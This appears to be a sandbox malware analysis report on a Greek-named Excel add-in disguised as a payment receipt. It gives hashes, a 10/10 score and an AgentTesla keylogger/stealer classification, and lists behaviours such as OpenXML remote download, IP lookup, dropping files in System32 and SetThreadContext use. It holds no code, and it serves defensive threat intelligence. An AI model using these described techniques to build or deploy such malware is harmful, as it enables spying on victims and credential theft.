Extracted

• • Target

    απόδειξη πληρωμής.xla

  • Size

    49KB

  • MD5

    c8fe82a5c4bf0f70d6d1e53b62c3755a

  • SHA1

    cfe4dedf157b463cb18b697d8c3ca3a2c99b4776

  • SHA256

    5dd02f730b0078b018c8ec2fdf0791b3d547ebea3ce57f8d7d4ac53253e8dff8

  • SHA512

    3a9b99b40942fe3c8c9245fd7016ee060091297f2d8865a57a3e647f9fefde810ade71242cccc2d36c4cdee1a2a67d838a1e6e8c398162dc64e614e18db2459f

  • SSDEEP

    768:N1yBP0tNFCybZey9F6434PeiV0JfmcCip781qAnC7Tn6i:N168tu6v3YcCkcqiC7Tnh

  Score

  10^/10

  agentteslakeyloggerspywarestealertrojan

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla

  • Blocklisted process makes network request

  • Abuses OpenXML format to download file from external location

  • Looks up external IP address via web service

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory

  • Suspicious use of SetThreadContext

  behavioral1behavioral2